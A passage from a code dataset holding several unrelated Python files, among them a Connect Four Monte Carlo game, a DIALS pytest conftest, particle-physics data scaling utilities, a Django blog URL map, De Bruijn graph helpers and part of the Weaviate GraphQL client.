load('elements')]\n","sub_path":"ropeelements/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"578793400","text":"import numpy as np\nimport random\nimport pygame\nimport sys\nimport math\nimport time\nimport threading\n\nBLUE = (0, 0, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\nROW_COUNT = 6\nCOLUMN_COUNT = 7\n\nPLAYER = 0\nAI = 1\n\nEMPTY = 0\nPLAYER_PIECE = 1\nAI_PIECE = 2\n\nWINDOW_LENGTH = 4\n\ntotal_samples = 0\ngrand_total_samples = 0\n\npayouts1 = {}\npayouts2 = {}\npayouts3 = {}\npayouts4 = {}\ngrandPayouts = {}\n\nthreadLock = threading.Lock()\nthreads = []\n\n\nclass myThread (threading.Thread):\n def __init__(self, board, payouts):\n threading.Thread.__init__(self)\n self.board = board\n self.payouts = payouts\n\n def run(self):\n # Get lock to synchronize threads\n threadLock.acquire()\n monte_carlo(self.board, self.payouts)\n # Free lock to release next thread\n threadLock.release()\n\n\ndef create_board():\n board = np.zeros((ROW_COUNT, COLUMN_COUNT))\n return board\n\n\ndef drop_piece(board, row, col, piece):\n board[row][col] = piece\n\n\ndef is_valid_location(board, col):\n return board[ROW_COUNT - 1][col] == 0\n\n\ndef get_next_open_row(board, col):\n for r in range(ROW_COUNT):\n if board[r][col] == 0:\n return r\n\n\ndef print_board(board):\n print(np.flip(board, 0))\n\n\ndef winning_move(board, piece):\n # Check horizontal locations for win\n for c in range(COLUMN_COUNT - 3):\n for r in range(ROW_COUNT):\n if board[r][c] == piece and board[r][c + 1] == piece and board[r][c + 2] == piece and board[r][\n c + 3] == piece:\n return True\n\n # Check vertical locations for win\n for c in range(COLUMN_COUNT):\n for r in range(ROW_COUNT - 3):\n if board[r][c] == piece and board[r + 1][c] == piece and board[r + 2][c] == piece and board[r + 3][\n c] == piece:\n return True\n\n # Check positively sloped diaganols\n for c in range(COLUMN_COUNT - 3):\n for r in range(ROW_COUNT - 3):\n if board[r][c] == piece and board[r + 1][c + 1] == piece and board[r + 2][c + 2] == piece and board[r + 3][\n c + 3] == piece:\n return True\n\n # Check negatively sloped diaganols\n for c in range(COLUMN_COUNT - 3):\n for r in range(3, ROW_COUNT):\n if board[r][c] == piece and board[r - 1][c + 1] == piece and board[r - 2][c + 2] == piece and board[r - 3][\n c + 3] == piece:\n return True\n\n\ndef is_terminal_node(board):\n return winning_move(board, PLAYER_PIECE) or winning_move(board, AI_PIECE) or len(get_valid_locations(board)) == 0\n\n\ndef calc_conf_interval(wins, draws, move_samples, total_samples):\n first_term = (wins + (draws / 2)) / move_samples\n second_term = 2 * math.sqrt(((np.log(total_samples)) / move_samples))\n return first_term + second_term\n\n\ndef monte_carlo(board, payouts):\n # dict of nodes and payouts\n count = 0\n start_time = time.time()\n seconds = 10\n global total_samples\n # check if position is terminal\n while not (is_terminal_node(board)):\n conf_interval = 0\n\n # begin monte carlo search\n while True:\n current_time = time.time()\n elapsed_time = current_time - start_time\n if elapsed_time > seconds:\n break\n board_copy = board.copy()\n selected_move = selection(board_copy, total_samples, payouts)\n # use map/reduce for this\n total_samples += simulation(board_copy, selected_move, payouts)\n count += 1\n\n print(count)\n return selected_move\n\n\n# calculates confidence interval for each valid move and returns move with highest interval.\n# priority given to moves that are unsampled\ndef selection(board_copy, total_moves, payouts):\n max_conf = 0\n max_move = ()\n open_cols = get_valid_locations(board_copy)\n for col in open_cols:\n row = get_next_open_row(board_copy, col)\n node = (row, col)\n\n # check moves that haven't been tried yet\n if node not in payouts.keys():\n return node\n else:\n confidence_interval = calc_conf_interval(payouts[node][0], payouts[node][1], payouts[node][3], total_moves)\n if confidence_interval > max_conf:\n max_move = node\n max_conf = confidence_interval\n\n return max_move\n\n\n# simulates random moves from starting move to determine winner\n# updates wins/draws/losses/samples stats of each node simulated\n# returns number of nodes simulated\ndef simulation(board_copy, move, payouts):\n sequence = []\n player_turn = 2\n total_moves = 1\n\n # move: (row, col)\n drop_piece(board_copy, move[0], move[1], player_turn)\n sequence.append(move)\n while not is_terminal_node(board_copy):\n # make a move\n valid_moves = get_valid_locations(board_copy)\n selected_move = random.choice(valid_moves)\n row = get_next_open_row(board_copy, selected_move)\n drop_piece(board_copy, row, selected_move, player_turn)\n total_moves += 1\n\n # add move to sequence\n node = (row, selected_move)\n sequence.append(node)\n\n # switch turns\n if player_turn == 2:\n player_turn = 1\n else:\n player_turn = 2\n\n # [wins, draws, losses, total_trials]\n # backpropagation\n if winning_move(board_copy, PLAYER_PIECE):\n for node in sequence:\n if node not in payouts:\n payouts[node] = [0, 0, 1, 1]\n else:\n # add 1 to losses and total trials\n payouts[node][2] += 1\n payouts[node][3] += 1\n\n elif winning_move(board_copy, AI_PIECE):\n for node in sequence:\n if node not in payouts:\n payouts[node] = [1, 0, 0, 1]\n else:\n # add 1 to wins and total trials\n payouts[node][0] += 1\n payouts[node][3] += 1\n else:\n for node in sequence:\n if node not in payouts:\n payouts[node] = [0, 1, 0, 1]\n else:\n # add 1 to draws and total trials\n payouts[node][1] += 1\n payouts[node][3] += 1\n return total_moves\n\n\ndef get_valid_locations(board):\n valid_locations = []\n for col in range(COLUMN_COUNT):\n if is_valid_location(board, col):\n valid_locations.append(col)\n return valid_locations\n\n\ndef draw_board(board):\n for c in range(COLUMN_COUNT):\n for r in range(ROW_COUNT):\n pygame.draw.rect(screen, BLUE, (c * SQUARESIZE, r * SQUARESIZE + SQUARESIZE, SQUARESIZE, SQUARESIZE))\n pygame.draw.circle(screen, BLACK, (\n int(c * SQUARESIZE + SQUARESIZE / 2), int(r * SQUARESIZE + SQUARESIZE + SQUARESIZE / 2)), RADIUS)\n\n for c in range(COLUMN_COUNT):\n for r in range(ROW_COUNT):\n if board[r][c] == PLAYER_PIECE:\n pygame.draw.circle(screen, RED, (\n int(c * SQUARESIZE + SQUARESIZE / 2), height - int(r * SQUARESIZE + SQUARESIZE / 2)), RADIUS)\n elif board[r][c] == AI_PIECE:\n pygame.draw.circle(screen, YELLOW, (\n int(c * SQUARESIZE + SQUARESIZE / 2), height - int(r * SQUARESIZE + SQUARESIZE / 2)), RADIUS)\n pygame.display.update()\n\n\ndef join_payouts():\n global grand_total_samples\n for node in payouts1.keys():\n if node not in grandPayouts:\n grandPayouts[node] = payouts1[node]\n else:\n grandPayouts[node][0] += payouts1[node][0]\n grandPayouts[node][1] += payouts1[node][1]\n grandPayouts[node][2] += payouts1[node][2]\n grandPayouts[node][3] += payouts1[node][3]\n if node in payouts2.keys():\n grandPayouts[node][0] += payouts2[node][0]\n grandPayouts[node][1] += payouts2[node][1]\n grandPayouts[node][2] += payouts2[node][2]\n grandPayouts[node][3] += payouts2[node][3]\n if node in payouts3.keys():\n grandPayouts[node][0] += payouts3[node][0]\n grandPayouts[node][1] += payouts3[node][1]\n grandPayouts[node][2] += payouts3[node][2]\n grandPayouts[node][3] += payouts3[node][3]\n if node in payouts4.keys():\n grandPayouts[node][0] += payouts4[node][0]\n grandPayouts[node][1] += payouts4[node][1]\n grandPayouts[node][2] += payouts4[node][2]\n grandPayouts[node][3] += payouts4[node][3]\n grand_total_samples += grandPayouts[node][3]\n return grand_total_samples\n\n\nif __name__ == '__main__':\n board = create_board()\n print_board(board)\n game_over = False\n\n pygame.init()\n\n SQUARESIZE = 100\n\n width = COLUMN_COUNT * SQUARESIZE\n height = (ROW_COUNT + 1) * SQUARESIZE\n\n size = (width, height)\n\n RADIUS = int(SQUARESIZE / 2 - 5)\n\n screen = pygame.display.set_mode(size)\n draw_board(board)\n pygame.display.update()\n\n myfont = pygame.font.SysFont(\"monospace\", 75)\n\n turn = random.randint(PLAYER, AI)\n print(turn)\n\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if turn == PLAYER:\n # Create new threads\n thread1 = myThread(board, payouts1)\n thread2 = myThread(board, payouts2)\n thread3 = myThread(board, payouts3)\n thread4 = myThread(board, payouts4)\n\n # Start new threads\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n # Add threads to thread list\n threads.append(thread1)\n threads.append(thread2)\n threads.append(thread3)\n threads.append(thread4)\n\n # Wait for all threads to complete\n for t in threads:\n t.join()\n\n # Perform one more selection based on grand total of payouts\n grandTotal = join_payouts()\n AI_move = selection(board, grandTotal, grandPayouts)\n drop_piece(board, AI_move[0], AI_move[1], PLAYER_PIECE)\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, YELLOW)\n screen.blit(label, (40, 10))\n game_over = True\n\n print_board(board)\n draw_board(board)\n\n grandPayouts.clear()\n\n turn += 1\n turn = turn % 2\n\n # # Ask for Player 2 Input\n if turn == AI and not game_over:\n # Create new threads\n thread1 = myThread(board, payouts1)\n thread2 = myThread(board, payouts2)\n thread3 = myThread(board, payouts3)\n thread4 = myThread(board, payouts4)\n\n # Start new threads\n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n\n # Add threads to thread list\n threads.append(thread1)\n threads.append(thread2)\n threads.append(thread3)\n threads.append(thread4)\n\n # Wait for all threads to complete\n for t in threads:\n t.join()\n\n # Perform one more selection based on grand total of payouts\n grandTotal = join_payouts()\n AI_move = selection(board, grandTotal, grandPayouts)\n drop_piece(board, AI_move[0], AI_move[1], AI_PIECE)\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, YELLOW)\n screen.blit(label, (40, 10))\n game_over = True\n\n print_board(board)\n draw_board(board)\n\n grandPayouts.clear()\n\n turn += 1\n turn = turn % 2\n\n if game_over:\n pygame.time.wait(3000)\n","sub_path":"connect4_ai_vs_ai.py","file_name":"connect4_ai_vs_ai.py","file_ext":"py","file_size_in_byte":11846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"493638216","text":"# Python program that will return true if the two given integer values are equal or their sum or difference is 5.\n\nn1 = int(input(\"Enter first number:\"))\nn2 = int(input(\"Enter second number:\"))\n\nif n1==n2 or n1-n2==5 or n1+n2==5:\n print(True)\n\nelse:\n print(False)","sub_path":"prac28.py","file_name":"prac28.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268529435","text":"#\n# See https://github.com/dials/dials/wiki/pytest for documentation on how to\n# write and run pytest tests, and an overview of the available features.\n#\n\n\nfrom __future__ import absolute_import, division, print_function\n\nimport os\nimport warnings\n\nimport pytest\nimport six\n\n# https://stackoverflow.com/a/40846742\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.ufunc size changed\")\n\ncollect_ignore = []\nif six.PY2:\n _base = os.path.dirname(__file__)\n with open(os.path.join(_base, \".travis\", \"python2-supported-files\"), \"r\") as fh:\n allowed_testfiles = {tuple(f.strip()[2:].split(\"/\")) for f in fh}\n for root, dirs, files in os.walk(_base):\n relroot = os.path.relpath(root, _base).split(os.path.sep)\n if relroot == [\".\"]:\n relroot = []\n for f in files:\n if f.endswith(\".py\"):\n filetuple = tuple(relroot + [f])\n if filetuple not in allowed_testfiles:\n collect_ignore.append(os.path.join(*filetuple))\n warnings.warn(\n \"%d test files were excluded as they can only be interpreted with Python 3\"\n % len(collect_ignore),\n UserWarning,\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef python3():\n if six.PY2:\n pytest.skip(\"Test requires a Python 3 installation\")\n\n\ndef pytest_addoption(parser):\n \"\"\"Add a '--runslow' option to py.test.\"\"\"\n parser.addoption(\n \"--runslow\", action=\"store_true\", default=False, help=\"run slow tests\"\n )\n\n\ndef pytest_collection_modifyitems(config, items):\n \"\"\"Tests marked as slow will not be run unless slow tests are enabled with\n the '--runslow' parameter or the test is selected specifically. The\n latter allows running slow tests via the libtbx compatibility layer.\"\"\"\n if not config.getoption(\"--runslow\") and len(items) > 1:\n skip_slow = pytest.mark.skip(reason=\"need --runslow option to run\")\n for item in items:\n if \"slow\" in item.keywords:\n item.add_marker(skip_slow)\n\n\ndef pytest_configure(config):\n if not config.pluginmanager.hasplugin(\"dials_data\"):\n\n @pytest.fixture(scope=\"session\")\n def dials_data():\n pytest.skip(\"This test requires the dials_data package to be installed\")\n\n globals()[\"dials_data\"] = dials_data\n\n\n@pytest.fixture(scope=\"session\")\ndef dials_regression():\n \"\"\"Return the absolute path to the dials_regression module as a string.\n Skip the test if dials_regression is not installed.\"\"\"\n try:\n import dials_regression as dr\n\n return os.path.dirname(dr.__file__)\n except ImportError:\n pass # dials_regression not configured\n try:\n import socket\n\n reference_copy = \"/dls/science/groups/scisoft/DIALS/repositories/git-reference/dials_regression\"\n if (\n os.name == \"posix\"\n and socket.gethostname().endswith(\".diamond.ac.uk\")\n and os.path.exists(reference_copy)\n ):\n return reference_copy\n except ImportError:\n pass # can not tell whether in DLS network or not\n pytest.skip(\"dials_regression required for this test\")\n\n\n@pytest.fixture\ndef run_in_tmpdir(tmpdir):\n \"\"\"Shortcut to create a temporary directory and then run the test inside\n this directory.\"\"\"\n tmpdir.chdir()\n return tmpdir\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"247178926","text":"\"\"\"\nGiven a positive integer n and you can do operations as follow:\n\nIf n is even, replace n with n/2.\nIf n is odd, you can replace n with either n + 1 or n - 1.\nWhat is the minimum number of replacements needed for n to become 1?\n\nExample 1:\n\nInput:\n8\n\nOutput:\n3\n\nExplanation:\n8 -> 4 -> 2 -> 1\nExample 2:\n\nInput:\n7\n\nOutput:\n4\n\nExplanation:\n7 -> 8 -> 4 -> 2 -> 1\nor\n7 -> 6 -> 3 -> 2 -> 1\n\"\"\"\n\nclass Solution(object):\n def integerReplacement(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n self.Dict = {}\n self.Dict[1] = 0\n self.Dict[2] = 1\n \n t = 1\n count = 0\n while t <= n:\n t = t*2\n count += 1\n self.Dict[t] = count\n #self.Dict[t] = count\n \n return self.recursiveSolution(n)\n \"\"\"\n t = 1\n count = 0\n while t < n:\n count += 1\n t = t*2\n \n if t == n:\n return count\n sig = (t - n < n-t/2) # + if sig is True\n\n count = 0\n \n while n != 1:\n print n\n if n%2 == 0:\n n = n/2\n else:\n if sig:\n n = n+1\n else:\n n = n-1\n count += 1\n \n return count\n \n \"\"\"\n \n def recursiveSolution(self, n):\n \n if n in self.Dict:\n return self.Dict[n]\n #print n\n cand = n-1\n if n%2 == 0:\n cand = min(cand,self.recursiveSolution(n/2)+1)\n else:\n cand = min(cand,self.recursiveSolution(n-1)+1)\n cand = min(cand,self.recursiveSolution(n+1)+1)\n \n self.Dict[n] = cand\n \n return cand\n \n \n \n \n \n \n \n \n ","sub_path":"Algorithms/#397 Integer Replacement/PythonCode.py","file_name":"PythonCode.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"60833182","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import RobustScaler, QuantileTransformer, StandardScaler\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport os\nfrom time import time\n\ndata_dir = 'data/data_calibsample/'\nif 'research.utils_rich_mrartemev' != __name__:\n data_dir = '../{}'.format(data_dir)\n\ndef get_particle_dset(particle):\n return [data_dir + name for name in os.listdir(data_dir) if particle in name]\n\nlist_particles = ['kaon', 'pion', 'proton', 'muon', 'electron']\nPARTICLES = list_particles\n\ndatasets = {particle: get_particle_dset(particle) for particle in list_particles} \n\n\ndll_columns = ['RichDLLe', 'RichDLLk', 'RichDLLmu', 'RichDLLp', 'RichDLLbt']\nraw_feature_columns = [ 'Brunel_P', 'Brunel_ETA', 'nTracks_Brunel' ]\nweight_col = 'probe_sWeight'\n \ny_count = len(dll_columns)\nTEST_SIZE = 0.5\n\ndef load_and_cut(file_name):\n data = pd.read_csv(file_name, delimiter='\\t')\n return data[dll_columns+raw_feature_columns+[weight_col]]\n\ndef load_and_merge_and_cut(filename_list):\n return pd.concat([load_and_cut(fname) for fname in filename_list], axis=0, ignore_index=True)\n\ndef split(data):\n data_train, data_val = train_test_split(data, test_size=TEST_SIZE, random_state=42)\n data_val, data_test = train_test_split(data_val, test_size=TEST_SIZE, random_state=1812)\n return data_train.reset_index(drop=True), \\\n data_val .reset_index(drop=True), \\\n data_test .reset_index(drop=True)\n\ndef get_tf_dataset(dataset, batch_size):\n suffled_ds = tf.data.Dataset.from_tensor_slices(dataset).repeat().shuffle(batch_size+1)\n return suffled_ds.batch(batch_size).prefetch(1).make_one_shot_iterator().get_next()\n\ndef scale_pandas(dataframe, scaler):\n return pd.DataFrame(scaler.transform(dataframe.values), columns=dataframe.columns)\n\n\ndef get_all_particles_dataset(dtype=None, log=False, n_quantiles=100000):\n data_train_all = []\n data_val_all = []\n scaler_all = {}\n for index, particle in enumerate(list_particles):\n data_train, data_val, scaler = get_merged_typed_dataset(particle, dtype=dtype, log=log, n_quantiles=n_quantiles)\n ohe_table = pd.DataFrame(np.zeros((len(data_train), len(list_particles))), columns=['is_{}'.format(i) for i in list_particles])\n ohe_table['is_{}'.format(particle)] = 1\n \n data_train_all.append(pd.concat([data_train.iloc[:, :y_count],\n ohe_table, \n data_train.iloc[:, y_count:]], axis=1))\n\n data_val_all.append(pd.concat([data_val.iloc[:, :y_count],\n ohe_table[:len(data_val)].copy(), \n data_val.iloc[:, y_count:]], axis=1))\n scaler_all[index] = scaler\n data_train_all = pd.concat(data_train_all, axis=0).astype(dtype, copy=False)\n data_val_all = pd.concat(data_val_all, axis=0).astype(dtype, copy=False)\n return data_train_all, data_val_all, scaler_all\n\n \ndef get_merged_typed_dataset(particle_type, dtype=None, log=False, n_quantiles=100000):\n file_list = datasets[particle_type]\n if log:\n print(\"Reading and concatenating datasets:\")\n for fname in file_list: print(\"\\t{}\".format(fname))\n data_full = load_and_merge_and_cut(file_list)\n # Must split the whole to preserve train/test split\"\"\n if log: print(\"splitting to train/val/test\")\n data_train, data_val, _ = split(data_full)\n if log: print(\"fitting the scaler\")\n print(\"scaler train sample size: {}\".format(len(data_train)))\n start_time = time()\n if n_quantiles == 0:\n scaler = StandardScaler().fit(data_train.drop(weight_col, axis=1).values)\n else:\n scaler = QuantileTransformer(output_distribution=\"normal\",\n n_quantiles=n_quantiles,\n subsample=int(1e10)).fit(data_train.drop(weight_col, axis=1).values)\n print(\"scaler n_quantiles: {}, time = {}\".format(n_quantiles, time()-start_time))\n if log: print(\"scaling train set\")\n data_train = pd.concat([scale_pandas(data_train.drop(weight_col, axis=1), scaler), data_train[weight_col]], axis=1)\n if log: print(\"scaling test set\")\n data_val = pd.concat([scale_pandas(data_val.drop(weight_col, axis=1), scaler), data_val[weight_col]], axis=1)\n if dtype is not None:\n if log: print(\"converting dtype to {}\".format(dtype))\n data_train = data_train.astype(dtype, copy=False)\n data_val = data_val.astype(dtype, copy=False)\n return data_train, data_val, scaler\n","sub_path":"notebooks/rich_utils/utils_rich_mrartemev.py","file_name":"utils_rich_mrartemev.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"606453753","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom blog import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name = 'home'),\n url(r'^show/(?P\\d+)/$', views.showPost, name='showPost'),\n url(r'^addComment/(?P\\d+)/$', views.addComment, name='addComment'),\n url(r'^addPost/$', views.addPost, name='addPost'),\n url(r'^editPost/(?P\\d+)/$', views.editPost, name='editPost'),\n url(r'^deletePost/(?P\\d+)/$', views.deletePost, name='deletePost'),\n url(r'^editComment/(?P\\d+)/(?P\\d+)/$', views.editComment, name='editComment'),\n url(r'^deleteComment/(?P\\d+)/(?P\\d+)/$', views.deleteComment, name='deleteComment'),\n url(r'^archiveView/(?P\\w+)/(?P\\d+)/$', views.archiveView, name='archiveView'),\n url(r'^tagView/(?P\\w+)/$', views.tagView, name='tagView'),\n\n)","sub_path":"reincubate_test/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"160720491","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 7 16:01:46 2018\n\n@author: danpal\n\"\"\"\n\nimport itertools\ntry:\n import graph_tool\nexcept ModuleNotFoundError as e:\n print(e.args[0])\n\n\ndef getComposition(text, k):\n comp = []\n for i in range(len(text) - k + 1):\n comp.append(text[i:i+k])\n comp.sort()\n return comp\n\n\ndef getStringSpelledByPath(seq_list):\n string = ''\n for seq in seq_list[:-1]:\n string += seq[0]\n string += seq_list[-1]\n return string\n\n\nclass Vertex:\n def __init__(self, name):\n self.name = name\n self.edges_to = set()\n self.edges_from = set()\n\n def addEdgeTo(self, vertex):\n self.edges_to.add(vertex)\n vertex.addEdgeFrom(self)\n\n def addEdgeFrom(self, vertex):\n self.edges_from.add(vertex)\n\n def __hash__(self):\n return hash(self.__repr__)\n\n def __eq__(self, other):\n return self.__repr__() == other.__repr__()\n\n def __repr__(self):\n return f'Vertex({self.name!r})'\n\n\nclass DiGraph:\n def __init__(self, vertices=None):\n self.adj_list = {}\n if vertices is not None:\n for vertex in vertices:\n self.addVertex(vertex)\n\n def addVertex(self, vertex: Vertex):\n self.adj_list[vertex] = vertex.edges_to\n\n def __str__(self):\n text = ''\n for vert in self.adj_list:\n text += f'{vert} -> {\",\".join(self.adj_list[vert])}\\n'\n return text\n\n def __repr__(self):\n return f'DiGraph({list(self.adj_list.keys())!r})'\n\n\ndef getOverlap(seq_list):\n adj_list = {seq: set() for seq in seq_list}\n for seq1, seq2 in itertools.combinations(seq_list, 2):\n if seq1[1:] == seq2[:-1]:\n adj_list[seq1].add(seq2)\n if seq2[1:] == seq1[:-1]:\n adj_list[seq2].add(seq1)\n return adj_list\n\n\ndef printAdjacencyList(adj_list):\n list_ = [f'{vert} -> {\",\".join(adj_list[vert])}' for vert in adj_list]\n print(*list_, sep='\\n')\n\n\ndef getKmerUniversalBinariesBF(k):\n \"\"\"Get all binary strings with the binaries up to 2 ** k exactly once\n\n Brute Force method: INEFICCIENT\n \"\"\"\n binaries = []\n length = 2 ** k + k - 1\n num_kmers = 2 ** k\n for i in range(2 ** length):\n s = set()\n b = bin(i)[2:].zfill(length)\n for j in range(num_kmers):\n s.add(b[j:j+k])\n if len(s) == num_kmers:\n binaries.append(b)\n return binaries\n\n\ndef getDeBruijnGraph(text, k):\n adj_list = {}\n seq_list = []\n for i in range(len(text) - k + 1):\n seq = text[i:i+k]\n seq_list.append(seq)\n adj_list[seq[:-1]] = []\n for seq in seq_list:\n adj_list[seq[:-1]].append(seq[1:])\n\n return adj_list\n\n\ndef plotGraph(adj_list, text, k, file_name):\n d = {}\n graph = graph_tool.Graph()\n v_prop = graph.new_vertex_property('string')\n # e_prop = graph.new_edge_property('string')\n graph.vertex_properties['NodeLabel'] = v_prop\n i = 0\n print(d)\n for i in range(len(text) - k + 2):\n kmer = text[i:i+k-1]\n if kmer not in d:\n v = graph.add_vertex()\n d[kmer] = v\n v_prop[v] = kmer\n for v1 in adj_list:\n for v2 in adj_list[v1]:\n graph.add_edge(d[v1], d[v2])\n graph.save(file_name)\n return graph\n\n\ndef getDeBruijnGraphFromKmers(seq_list):\n adj_list = {seq[:-1]: [] for seq in seq_list}\n for seq in seq_list:\n adj_list[seq[:-1]].append(seq[1:])\n return adj_list\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"python/coursera/bioinf/coursera3.py","file_name":"coursera3.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"249383081","text":"\"\"\"\nGraphQL filters for `Get` and `Aggregate` commands.\nGraphQL abstract class for GraphQL commands to inherit from.\n\"\"\"\nimport json\nimport sys\nfrom copy import deepcopy\nfrom typing import Optional\nfrom abc import ABC, abstractmethod\nfrom weaviate.connect import REST_METHOD_POST, Connection\nfrom weaviate import UnexpectedStatusCodeException, RequestsConnectionError\nfrom weaviate.util import get_vector\n\nclass GraphQL(ABC):\n \"\"\"\n A base abstract class for GraphQL commands, such as Get, Aggregate.\n \"\"\"\n\n def __init__(self, connection: Connection):\n \"\"\"\n Initialize a GraphQL abstract class instance.\n\n Parameters\n ----------\n connection : weaviate.connect.Connection\n Connection object to an active and running weaviate instance.\n \"\"\"\n\n self._connection = connection\n\n @abstractmethod\n def build(self) -> str:\n \"\"\"\n Build method to be overloaded by the child classes. It should return the\n GraphQL query as a str.\n\n Returns\n -------\n str\n The query.\n \"\"\"\n\n def do(self) -> dict:\n \"\"\"\n Builds and runs the query.\n\n Returns\n -------\n dict\n The response of the query.\n\n Raises\n ------\n requests.ConnectionError\n If the network connection to weaviate fails.\n weaviate.UnexpectedStatusCodeException\n If weaviate reports a none OK status.\n \"\"\"\n\n query = self.build()\n\n try:\n response = self._connection.run_rest(\"/graphql\", REST_METHOD_POST, {\"query\": query})\n except RequestsConnectionError as conn_err:\n message = str(conn_err) + ' Connection error, query was not successful.'\n raise type(conn_err)(message).with_traceback(sys.exc_info()[2])\n if response.status_code == 200:\n return response.json() # success\n raise UnexpectedStatusCodeException(\"Query was not successful\", response)\n\n\nclass Filter(ABC):\n \"\"\"\n A base abstract class for all filters.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a Filter class instance.\n\n Parameters\n ----------\n content : dict\n The content of the `Filter` clause.\n \"\"\"\n\n\n if not isinstance(content, dict):\n raise TypeError(f\"{self.__class__.__name__} filter is expected to \"\n f\"be type dict but was {type(content)}\")\n\n @abstractmethod\n def __str__(self) -> str:\n \"\"\"\n Should be implemented in each inheriting class.\n \"\"\"\n\n\nclass NearText(Filter):\n \"\"\"\n NearText class used to filter weaviate objects. Can be used with text models only (text2vec).\n E.g.: text2vec-contextionary, text2vec-transformers.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a NearText class instance.\n\n Parameters\n ----------\n content : dict\n The content of the `nearText` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n \"\"\"\n\n super().__init__(content)\n\n _content = deepcopy(content)\n _check_concept(_content)\n self.concepts = _content[\"concepts\"]\n self.certainty: Optional[float] = None\n self.move_to: Optional[dict] = None\n self.move_away_from: Optional[dict] = None\n\n if \"certainty\" in _content:\n _check_certainty_type(_content[\"certainty\"])\n self.certainty = _content[\"certainty\"]\n\n if \"moveTo\" in _content:\n _check_direction_clause(_content[\"moveTo\"])\n self.move_to = _content[\"moveTo\"]\n\n if \"moveAwayFrom\" in _content:\n _check_direction_clause(_content[\"moveAwayFrom\"])\n self.move_away_from = _content[\"moveAwayFrom\"]\n\n def __str__(self):\n near_text = f'nearText: {{concepts: {json.dumps(self.concepts)}'\n if self.certainty is not None:\n near_text += f' certainty: {str(self.certainty)}'\n if self.move_to is not None:\n near_text += (\n f' moveTo: {{concepts: {json.dumps(self.move_to[\"concepts\"])} ' +\\\n f'force: {self.move_to[\"force\"]}}}'\n )\n if self.move_away_from is not None:\n near_text += (\n f' moveAwayFrom: {{concepts: {json.dumps(self.move_away_from[\"concepts\"])} ' +\\\n f'force: {self.move_away_from[\"force\"]}}}'\n )\n return near_text + '} '\n\n\nclass NearVector(Filter):\n \"\"\"\n NearVector class used to filter weaviate objects.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a NearVector class instance.\n\n Parameters\n ----------\n content : list\n The content of the `nearVector` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' does not contain \"vector\".\n TypeError\n If 'content[\"vector\"]' is not of type list.\n AttributeError\n If invalid 'content' keys are provided.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n \"\"\"\n\n super().__init__(content)\n\n _content = deepcopy(content)\n if \"vector\" not in content:\n raise ValueError(\"No 'vector' key in `content` argument.\")\n self.vector = get_vector(_content['vector'])\n self.certainty: Optional[float] = None\n\n # Check optional fields\n\n if \"certainty\" in _content:\n _check_certainty_type(_content[\"certainty\"])\n self.certainty = _content[\"certainty\"]\n\n def __str__(self):\n near_vector = f'nearVector: {{vector: {json.dumps(self.vector)}'\n if self.certainty is not None:\n near_vector += f' certainty: {self.certainty}'\n return near_vector + '} '\n\n\nclass NearObject(Filter):\n \"\"\"\n NearObject class used to filter weaviate objects.\n \"\"\"\n\n def __init__(self, content: dict):\n \"\"\"\n Initialize a NearVector class instance.\n\n Parameters\n ----------\n content : list\n The content of the `nearVector` clause.\n\n Raises\n ------\n TypeError\n If 'content' is not of type dict.\n ValueError\n If 'content' has key \"certainty\" but the value is not float.\n TypeError\n If 'id'/'beacon' key does not have a value of type str!\n \"\"\"\n\n super().__init__(content)\n\n if ('id' in content) == ('beacon' in content):\n raise ValueError(\"The 'content' argument should contain EITHER `id` OR `beacon`!\")\n\n if 'id' in content:\n self.obj_id = 'id'\n else:\n self.obj_id = 'beacon'\n\n if not isinstance(content[self.obj_id], str):\n raise TypeError(\"The 'id'/'beacon' should be of type string! Given type\"\n + str(type(content[self.obj_id])))\n\n if \"certainty\" in content:\n _check_certainty_type(content[\"certainty\"])\n\n self._content = deepcopy(content)\n\n def __str__(self):\n\n near_object = f'nearObject: 